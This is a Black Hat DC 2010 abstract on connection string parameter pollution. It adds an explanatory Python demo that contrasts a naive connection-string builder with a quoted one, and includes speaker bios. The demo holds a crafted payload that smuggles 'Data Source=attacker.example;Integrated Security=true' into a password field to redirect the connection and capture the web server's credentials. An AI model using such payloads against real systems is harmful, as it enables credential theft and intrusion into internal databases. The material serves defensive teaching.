Connection String Parameter Pollution Attacks presented at Blackhat DC 2010

by Chema Alonso, Jose (Palako) Palazon (Yahoo)

Summary: This session is about Parameter Pollution attacks on connection strings. Today, many tools and web applications allow users to dynamically configure a connection to a database server. This session will demonstrate the high risk of doing this insecurely. It will show how, on Microsoft Internet Information Services, to steal the web server's user account credentials, how to gain access to these web applications by impersonating the connection and taking advantage of the web server's credentials, and how to connect to internal database servers in the DMZ without credentials. The impact of these techniques is especially dangerous for hosting companies that allow customers to connect to control panels to configure databases.
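The core of the attack described above is that a user-supplied value (typically the password field of a "connect to your database" form) is concatenated into a connection string, and the provider resolves repeated keys by letting the last occurrence win. The following is an added example, not code from the talk or its authors: a simplified Python model of ADO.NET-style connection-string parsing (semicolon-separated keys, case-insensitive, quoted values, last duplicate wins; this last-wins behaviour is the assumption the demo rests on and should be verified against the actual driver in use), a naive builder that is vulnerable to pollution, and a builder that quotes each value so the payload stays inside the password. The payload `ATTACKER_PASSWORD` and the host names are constructed for the demo.

```python
# Connection String Parameter Pollution (CSPP) demo: naive vs. quoted builder.
# Added example; the parser is a simplified model of how ADO.NET-style providers
# read a connection string (assumption: repeated keys resolve last-wins and
# quoted values may contain ';', with an embedded quote written doubled).

def parse_connection_string(cs: str) -> dict:
    """Parse 'Key=Value;Key2=Value2' into a dict; later duplicates overwrite earlier ones."""
    params = {}
    i, n = 0, len(cs)
    while i < n:
        while i < n and cs[i] in "; \t":      # skip separators and padding
            i += 1
        if i >= n:
            break
        eq = cs.find("=", i)
        if eq == -1:
            break
        key = cs[i:eq].strip().lower()
        i = eq + 1
        if i < n and cs[i] in "'\"":          # quoted value: ';' is literal inside
            quote = cs[i]
            i += 1
            buf = []
            while i < n:
                if cs[i] == quote:
                    if i + 1 < n and cs[i + 1] == quote:   # doubled quote = literal quote
                        buf.append(quote)
                        i += 2
                        continue
                    i += 1
                    break
                buf.append(cs[i])
                i += 1
            value = "".join(buf)
        else:                                  # bare value runs to the next ';'
            end = cs.find(";", i)
            if end == -1:
                end = n
            value = cs[i:end].strip()
            i = end
        params[key] = value                    # last occurrence wins (assumed provider behaviour)
    return params


def build_naive(server: str, user: str, password: str) -> str:
    """Vulnerable: raw concatenation lets ';' in any value introduce new keys."""
    return f"Data Source={server};Initial Catalog=app;User ID={user};Password={password}"


def build_quoted(server: str, user: str, password: str) -> str:
    """Hardened: every value is single-quoted and embedded quotes are doubled,
    so the provider treats the whole user input as the value of one key.
    In real .NET code the equivalent is SqlConnectionStringBuilder, which quotes for you."""
    def q(v: str) -> str:
        if any(ord(c) < 32 for c in v):
            raise ValueError("control character in connection string value")
        return "'" + v.replace("'", "''") + "'"
    return f"Data Source={q(server)};Initial Catalog=app;User ID={q(user)};Password={q(password)}"


# Constructed CSPP payload: overrides the server and switches on integrated
# (Windows) authentication, so the web server's own account would authenticate
# to the attacker-controlled host instead of sending the supplied password.
ATTACKER_PASSWORD = "x;Data Source=attacker.example;Integrated Security=true"


def demo():
    polluted = parse_connection_string(build_naive("db.internal", "webapp", ATTACKER_PASSWORD))
    safe = parse_connection_string(build_quoted("db.internal", "webapp", ATTACKER_PASSWORD))
    return polluted, safe


if __name__ == "__main__":
    polluted, safe = demo()
    print("naive  ->", polluted)   # data source is attacker.example, integrated security=true
    print("quoted ->", safe)       # data source is db.internal, payload stays in password
```

With the naive builder the parsed `data source` becomes `attacker.example` and `integrated security` is `true`; with the quoted builder the server stays `db.internal` and the entire payload is just the password value. Quoting is the minimum; the practitioner's check is whether the code path ever lets a user choose the server at all, and whether the pool account under which IIS runs has any rights on the internal database servers that integrated authentication would expose.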

Chema Alonso: Chema Alonso is a Computer Engineer from Rey Juan Carlos University and a Systems Engineer from the Polytechnic University of Madrid. He has worked as a security consultant for the last six years and has been awarded Microsoft Most Valuable Professional every year since 2005. He is a frequent Microsoft speaker at security conferences and writes monthly in several Spanish technical magazines. He is currently working on his PhD thesis on blind techniques. He recently spoke at BH Europe 2008 about LDAP Injection and Blind LDAP Injection attacks, at Defcon 16 about Time-Based Blind SQL Injection using heavy queries, at Toorcon X about RFD (Remote File Downloading) and at DeepSec 2k8 in Austria. He has been selected to present at HackCon#4 in Norway, ShmooCon 2k9 in Washington DC, BlackHat Europe 2k9 and Defcon 17.

Jose (Palako) Palazon: Jose Palazon (palako) is globally responsible for mobile security at Yahoo!. With more than 9 years of experience in security auditing, consulting and training for the public, private and academic sectors, his areas of expertise include mobile, web security, Unix systems security and digital forensics. A frequent international speaker, he has presented, among others, at DEFCON (Las Vegas), Shmoocon (Washington) and FOWA (London), and has published vulnerabilities in key sites such as